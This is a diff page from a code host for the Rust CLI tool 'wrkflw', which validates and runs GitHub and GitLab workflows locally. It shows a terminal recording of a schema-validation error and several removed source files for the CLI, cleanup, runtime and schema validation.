[110.089516, "o", "v"]
|
||||
[110.259654, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[112.918071, "o", "\b\u001b[0m -"]
|
||||
[113.487665, "o", "e"]
|
||||
[114.05841, "o", "\u001b[?1l\u001b>"]
|
||||
[114.05869, "o", "\u001b[?2004l\r\r\n"]
|
||||
[114.060284, "o", "\u001b]2;cargo r -- run test_gitlab_ci/invalid.gitlab-ci.yml -e\u0007\u001b]1;cargo\u0007"]
|
||||
[114.193654, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.09s\r\n"]
|
||||
[114.200619, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw run test_gitlab_ci/invalid.gitlab-ci.yml -e`\r\n"]
|
||||
[114.727902, "o", "Error executing workflow: Parse error: Failed to parse GitLab pipeline: Schema validation error: GitLab CI validation failed:\r\n- {\"key\":[\"invalid\",\"key\",\"type\"],\"paths\":[\"${CARGO_HOME}\"],\"policy\":\"invalid-policy\"} is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- \"hello\" is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- Additional properties are not allowed ('scriptt', 'stagee' were unexpected)\r\n- {\"equals\":\"$CI_COMMIT_BRANCH == \\\"main\\\"\"} is not valid under any of the schemas listed in the 'anyOf' keyword\r\n\r\n"]
|
||||
[114.728458, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[114.72932, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[114.729328, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[114.731093, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[114.732938, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[114.73302, "o", "\u001b[?1h\u001b="]
|
||||
[114.733045, "o", "\u001b[?2004h"]
|
||||
[118.210217, "o", "\u001b[?2004l\r\r\n"]
|
||||
3012
schemas/gitlab-ci.json
Normal file
3012
schemas/gitlab-ci.json
Normal file
File diff suppressed because it is too large
Load Diff
@@ -1,44 +0,0 @@
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for EmulationRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
cmd: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// ... existing code ...
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
// ... existing code ...
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
// ... existing code ...
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| format!("eclipse-temurin:{}", v)),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| format!("mcr.microsoft.com/dotnet/sdk:{}", v)),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => return Err(ContainerError::ContainerStart(format!("Unsupported language: {}", language))),
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
52
src/lib.rs
52
src/lib.rs
@@ -1,52 +0,0 @@
|
||||
pub mod evaluator;
|
||||
pub mod executor;
|
||||
pub mod github;
|
||||
pub mod gitlab;
|
||||
pub mod logging;
|
||||
pub mod matrix;
|
||||
pub mod models;
|
||||
pub mod parser;
|
||||
pub mod runtime;
|
||||
pub mod ui;
|
||||
pub mod utils;
|
||||
pub mod validators;
|
||||
|
||||
use bollard::Docker;
|
||||
|
||||
/// Clean up all resources when exiting the application
|
||||
/// This is used by both main.rs and in tests
|
||||
pub async fn cleanup_on_exit() {
|
||||
// Clean up Docker resources if available, but don't let it block indefinitely
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(3), async {
|
||||
match Docker::connect_with_local_defaults() {
|
||||
Ok(docker) => {
|
||||
let _ = executor::docker::cleanup_containers(&docker).await;
|
||||
let _ = executor::docker::cleanup_networks(&docker).await;
|
||||
}
|
||||
Err(_) => {
|
||||
// Docker not available
|
||||
logging::info("Docker not available, skipping Docker cleanup");
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed successfully"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
|
||||
}
|
||||
}
|
||||
|
||||
// Always clean up emulation resources
|
||||
match tokio::time::timeout(
|
||||
std::time::Duration::from_secs(2),
|
||||
runtime::emulation::cleanup_resources(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Emulation cleanup completed successfully"),
|
||||
Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
|
||||
}
|
||||
|
||||
logging::info("Resource cleanup completed");
|
||||
}
|
||||
472
src/main.rs
472
src/main.rs
@@ -1,472 +0,0 @@
|
||||
// Import public modules from lib.rs
|
||||
use wrkflw::*;
|
||||
|
||||
use bollard::Docker;
|
||||
use clap::{Parser, Subcommand};
|
||||
use std::collections::HashMap;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[derive(Debug, Parser)]
|
||||
#[command(
|
||||
name = "wrkflw",
|
||||
about = "GitHub Workflow validator and executor",
|
||||
version,
|
||||
long_about = "A GitHub Workflow validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --emulate .github/workflows/build.yml # Use emulation mode instead of Docker"
|
||||
)]
|
||||
struct Wrkflw {
|
||||
#[command(subcommand)]
|
||||
command: Option<Commands>,
|
||||
|
||||
/// Run in verbose mode with detailed output
|
||||
#[arg(short, long, global = true)]
|
||||
verbose: bool,
|
||||
|
||||
/// Run in debug mode with extensive execution details
|
||||
#[arg(short, long, global = true)]
|
||||
debug: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Subcommand)]
|
||||
enum Commands {
|
||||
/// Validate GitHub workflow files
|
||||
Validate {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
},
|
||||
|
||||
/// Execute GitHub workflow files locally
|
||||
Run {
|
||||
/// Path to workflow file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Use emulation mode instead of Docker
|
||||
#[arg(short, long)]
|
||||
emulate: bool,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
},
|
||||
|
||||
/// Open TUI interface to manage workflows
|
||||
Tui {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Use emulation mode instead of Docker
|
||||
#[arg(short, long)]
|
||||
emulate: bool,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
},
|
||||
|
||||
/// Trigger a GitHub workflow remotely
|
||||
Trigger {
|
||||
/// Name of the workflow file (without .yml extension)
|
||||
workflow: String,
|
||||
|
||||
/// Branch to run the workflow on
|
||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value inputs for the workflow in format key=value
|
||||
#[arg(short, long, value_parser = parse_key_val)]
|
||||
input: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// Trigger a GitLab pipeline remotely
|
||||
TriggerGitlab {
|
||||
/// Branch to run the pipeline on
|
||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value variables for the pipeline in format key=value
|
||||
#[arg(short = 'V', long, value_parser = parse_key_val)]
|
||||
variable: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// List available workflows
|
||||
List,
|
||||
}
|
||||
|
||||
// Parser function for key-value pairs
|
||||
fn parse_key_val(s: &str) -> Result<(String, String), String> {
|
||||
let pos = s
|
||||
.find('=')
|
||||
.ok_or_else(|| format!("invalid KEY=value: no `=` found in `{}`", s))?;
|
||||
|
||||
Ok((s[..pos].to_string(), s[pos + 1..].to_string()))
|
||||
}
|
||||
|
||||
// Make this function public for testing
|
||||
pub async fn cleanup_on_exit() {
|
||||
// Clean up Docker resources if available, but don't let it block indefinitely
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(3), async {
|
||||
match Docker::connect_with_local_defaults() {
|
||||
Ok(docker) => {
|
||||
executor::cleanup_resources(&docker).await;
|
||||
}
|
||||
Err(_) => {
|
||||
// Docker not available
|
||||
logging::info("Docker not available, skipping Docker cleanup");
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed successfully"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
|
||||
}
|
||||
}
|
||||
|
||||
// Always clean up emulation resources
|
||||
match tokio::time::timeout(
|
||||
std::time::Duration::from_secs(2),
|
||||
runtime::emulation::cleanup_resources(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Emulation cleanup completed successfully"),
|
||||
Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
|
||||
}
|
||||
|
||||
logging::info("Resource cleanup completed");
|
||||
}
|
||||
|
||||
async fn handle_signals() {
|
||||
// Set up a hard exit timer in case cleanup takes too long
|
||||
// This ensures the app always exits even if Docker operations are stuck
|
||||
let hard_exit_time = std::time::Duration::from_secs(10);
|
||||
|
||||
// Wait for Ctrl+C
|
||||
match tokio::signal::ctrl_c().await {
|
||||
Ok(_) => {
|
||||
println!("Received Ctrl+C, shutting down and cleaning up...");
|
||||
}
|
||||
Err(e) => {
|
||||
// Log the error but continue with cleanup
|
||||
eprintln!("Warning: Failed to properly listen for ctrl+c event: {}", e);
|
||||
println!("Shutting down and cleaning up...");
|
||||
}
|
||||
}
|
||||
|
||||
// Set up a watchdog thread that will force exit if cleanup takes too long
|
||||
// This is important because Docker operations can sometimes hang indefinitely
|
||||
let _ = std::thread::spawn(move || {
|
||||
std::thread::sleep(hard_exit_time);
|
||||
eprintln!(
|
||||
"Cleanup taking too long (over {} seconds), forcing exit...",
|
||||
hard_exit_time.as_secs()
|
||||
);
|
||||
logging::error("Forced exit due to cleanup timeout");
|
||||
std::process::exit(1);
|
||||
});
|
||||
|
||||
// Clean up containers
|
||||
cleanup_on_exit().await;
|
||||
|
||||
// Exit with success status - the force exit thread will be terminated automatically
|
||||
std::process::exit(0);
|
||||
}
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() {
|
||||
let cli = Wrkflw::parse();
|
||||
let verbose = cli.verbose;
|
||||
let debug = cli.debug;
|
||||
|
||||
// Set log level based on command line flags
|
||||
if debug {
|
||||
logging::set_log_level(logging::LogLevel::Debug);
|
||||
logging::debug("Debug mode enabled - showing detailed logs");
|
||||
} else if verbose {
|
||||
logging::set_log_level(logging::LogLevel::Info);
|
||||
logging::info("Verbose mode enabled");
|
||||
} else {
|
||||
logging::set_log_level(logging::LogLevel::Warning);
|
||||
}
|
||||
|
||||
// Setup a Ctrl+C handler that runs in the background
|
||||
tokio::spawn(handle_signals());
|
||||
|
||||
match &cli.command {
|
||||
Some(Commands::Validate { path }) => {
|
||||
// Determine the path to validate
|
||||
let validate_path = path
|
||||
.clone()
|
||||
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
|
||||
|
||||
// Run the validation
|
||||
ui::validate_workflow(&validate_path, verbose).unwrap_or_else(|e| {
|
||||
eprintln!("Error: {}", e);
|
||||
std::process::exit(1);
|
||||
});
|
||||
}
|
||||
|
||||
Some(Commands::Run {
|
||||
path,
|
||||
emulate,
|
||||
show_action_messages: _,
|
||||
}) => {
|
||||
// Set runner mode based on flags
|
||||
let runtime_type = if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
};
|
||||
|
||||
// First validate the workflow file
|
||||
match parser::workflow::parse_workflow(path) {
|
||||
Ok(_) => logging::info("Validating workflow..."),
|
||||
Err(e) => {
|
||||
logging::error(&format!("Workflow validation failed: {}", e));
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
// Execute the workflow
|
||||
match executor::execute_workflow(path, runtime_type, verbose || debug).await {
|
||||
Ok(result) => {
|
||||
// Print job results
|
||||
for job in &result.jobs {
|
||||
println!(
|
||||
"\n{} Job {}: {}",
|
||||
if job.status == executor::JobStatus::Success {
|
||||
"✅"
|
||||
} else {
|
||||
"❌"
|
||||
},
|
||||
job.name,
|
||||
if job.status == executor::JobStatus::Success {
|
||||
"succeeded"
|
||||
} else {
|
||||
"failed"
|
||||
}
|
||||
);
|
||||
|
||||
// Print step results
|
||||
for step in &job.steps {
|
||||
println!(
|
||||
" {} {}",
|
||||
if step.status == executor::StepStatus::Success {
|
||||
"✅"
|
||||
} else {
|
||||
"❌"
|
||||
},
|
||||
step.name
|
||||
);
|
||||
|
||||
if !step.output.trim().is_empty() {
|
||||
// If the output is very long, trim it
|
||||
let output_lines = step.output.lines().collect::<Vec<&str>>();
|
||||
|
||||
println!(" Output:");
|
||||
|
||||
// In verbose mode, show complete output
|
||||
if verbose || debug {
|
||||
for line in &output_lines {
|
||||
println!(" {}", line);
|
||||
}
|
||||
} else {
|
||||
// Show only the first few lines
|
||||
let max_lines = 5;
|
||||
for line in output_lines.iter().take(max_lines) {
|
||||
println!(" {}", line);
|
||||
}
|
||||
|
||||
if output_lines.len() > max_lines {
|
||||
println!(" ... ({} more lines, use --verbose to see full output)",
|
||||
output_lines.len() - max_lines);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Print detailed failure information if available
|
||||
if let Some(failure_details) = &result.failure_details {
|
||||
println!("\n❌ Workflow execution failed!");
|
||||
println!("{}", failure_details);
|
||||
println!("\nTo fix these issues:");
|
||||
println!("1. Check the formatting issues with: cargo fmt");
|
||||
println!("2. Fix clippy warnings with: cargo clippy -- -D warnings");
|
||||
println!("3. Run tests to ensure everything passes: cargo test");
|
||||
std::process::exit(1);
|
||||
} else {
|
||||
println!("\n✅ Workflow completed successfully!");
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
logging::error(&format!("Workflow execution failed: {}", e));
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Some(Commands::Tui {
|
||||
path,
|
||||
emulate,
|
||||
show_action_messages,
|
||||
}) => {
|
||||
// Open the TUI interface
|
||||
let runtime_type = if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
// Check if Docker is available, fall back to emulation if not
|
||||
if !executor::docker::is_available() {
|
||||
println!("⚠️ Docker is not available. Using emulation mode instead.");
|
||||
logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
}
|
||||
};
|
||||
|
||||
// Control hiding action messages based on the flag
|
||||
if !show_action_messages {
|
||||
std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "true");
|
||||
} else {
|
||||
std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "false");
|
||||
}
|
||||
|
||||
match ui::run_wrkflw_tui(path.as_ref(), runtime_type, verbose).await {
|
||||
Ok(_) => {
|
||||
// Clean up on successful exit
|
||||
cleanup_on_exit().await;
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!("Error: {}", e);
|
||||
cleanup_on_exit().await;
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Some(Commands::Trigger {
|
||||
workflow,
|
||||
branch,
|
||||
input,
|
||||
}) => {
|
||||
logging::info(&format!("Triggering workflow {} on GitHub", workflow));
|
||||
|
||||
// Convert inputs to HashMap
|
||||
let input_map = input.as_ref().map(|i| {
|
||||
i.iter()
|
||||
.map(|(k, v)| (k.clone(), v.clone()))
|
||||
.collect::<HashMap<String, String>>()
|
||||
});
|
||||
|
||||
match github::trigger_workflow(workflow, branch.as_deref(), input_map).await {
|
||||
Ok(_) => logging::info("Workflow triggered successfully"),
|
||||
Err(e) => {
|
||||
eprintln!("Error triggering workflow: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Some(Commands::TriggerGitlab { branch, variable }) => {
|
||||
logging::info("Triggering pipeline on GitLab");
|
||||
|
||||
// Convert variables to HashMap
|
||||
let variable_map = variable.as_ref().map(|v| {
|
||||
v.iter()
|
||||
.map(|(k, v)| (k.clone(), v.clone()))
|
||||
.collect::<HashMap<String, String>>()
|
||||
});
|
||||
|
||||
match gitlab::trigger_pipeline(branch.as_deref(), variable_map).await {
|
||||
Ok(_) => logging::info("GitLab pipeline triggered successfully"),
|
||||
Err(e) => {
|
||||
eprintln!("Error triggering GitLab pipeline: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Some(Commands::List) => {
|
||||
logging::info("Listing available workflows");
|
||||
|
||||
// Attempt to get GitHub repo info
|
||||
if let Ok(repo_info) = github::get_repo_info() {
|
||||
match github::list_workflows(&repo_info).await {
|
||||
Ok(workflows) => {
|
||||
if workflows.is_empty() {
|
||||
println!("No GitHub workflows found in repository");
|
||||
} else {
|
||||
println!("GitHub workflows:");
|
||||
for workflow in workflows {
|
||||
println!(" {}", workflow);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!("Error listing GitHub workflows: {}", e);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
println!("Not a GitHub repository or unable to get repository information");
|
||||
}
|
||||
|
||||
// Attempt to get GitLab repo info
|
||||
if let Ok(repo_info) = gitlab::get_repo_info() {
|
||||
match gitlab::list_pipelines(&repo_info).await {
|
||||
Ok(pipelines) => {
|
||||
if pipelines.is_empty() {
|
||||
println!("No GitLab pipelines found in repository");
|
||||
} else {
|
||||
println!("GitLab pipelines:");
|
||||
for pipeline in pipelines {
|
||||
println!(" {}", pipeline);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!("Error listing GitLab pipelines: {}", e);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
println!("Not a GitLab repository or unable to get repository information");
|
||||
}
|
||||
}
|
||||
|
||||
None => {
|
||||
// Default to TUI interface if no subcommand
|
||||
// Check if Docker is available, fall back to emulation if not
|
||||
let runtime_type = if !executor::docker::is_available() {
|
||||
println!("⚠️ Docker is not available. Using emulation mode instead.");
|
||||
logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
};
|
||||
|
||||
// Set environment variable to hide action messages by default
|
||||
std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "true");
|
||||
|
||||
match ui::run_wrkflw_tui(
|
||||
Some(&PathBuf::from(".github/workflows")),
|
||||
runtime_type,
|
||||
verbose,
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(_) => {
|
||||
// Clean up on successful exit
|
||||
cleanup_on_exit().await;
|
||||
}
|
||||
Err(e) => {
|
||||
eprintln!("Error: {}", e);
|
||||
cleanup_on_exit().await;
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Final cleanup before program exit
|
||||
cleanup_on_exit().await;
|
||||
}
|
||||
@@ -1,24 +0,0 @@
|
||||
pub struct ValidationResult {
|
||||
pub is_valid: bool,
|
||||
pub issues: Vec<String>,
|
||||
}
|
||||
|
||||
impl Default for ValidationResult {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl ValidationResult {
|
||||
pub fn new() -> Self {
|
||||
ValidationResult {
|
||||
is_valid: true,
|
||||
issues: Vec::new(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn add_issue(&mut self, issue: String) {
|
||||
self.is_valid = false;
|
||||
self.issues.push(issue);
|
||||
}
|
||||
}
|
||||
@@ -1,43 +0,0 @@
|
||||
use jsonschema::JSONSchema;
|
||||
use serde_json::Value;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
|
||||
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../schemas/github-workflow.json");
|
||||
|
||||
pub struct SchemaValidator {
|
||||
schema: JSONSchema,
|
||||
}
|
||||
|
||||
impl SchemaValidator {
|
||||
pub fn new() -> Result<Self, String> {
|
||||
let schema_json: Value = serde_json::from_str(GITHUB_WORKFLOW_SCHEMA)
|
||||
.map_err(|e| format!("Failed to parse GitHub workflow schema: {}", e))?;
|
||||
|
||||
let schema = JSONSchema::compile(&schema_json)
|
||||
.map_err(|e| format!("Failed to compile JSON schema: {}", e))?;
|
||||
|
||||
Ok(Self { schema })
|
||||
}
|
||||
|
||||
pub fn validate_workflow(&self, workflow_path: &Path) -> Result<(), String> {
|
||||
// Read the workflow file
|
||||
let content = fs::read_to_string(workflow_path)
|
||||
.map_err(|e| format!("Failed to read workflow file: {}", e))?;
|
||||
|
||||
// Parse YAML to JSON Value
|
||||
let workflow_json: Value = serde_yaml::from_str(&content)
|
||||
.map_err(|e| format!("Failed to parse workflow YAML: {}", e))?;
|
||||
|
||||
// Validate against schema
|
||||
if let Err(errors) = self.schema.validate(&workflow_json) {
|
||||
let mut error_msg = String::from("Workflow validation failed:\n");
|
||||
for error in errors {
|
||||
error_msg.push_str(&format!("- {}\n", error));
|
||||
}
|
||||
return Err(error_msg);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
@@ -1,2 +0,0 @@
|
||||
pub mod container;
|
||||
pub mod emulation;
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user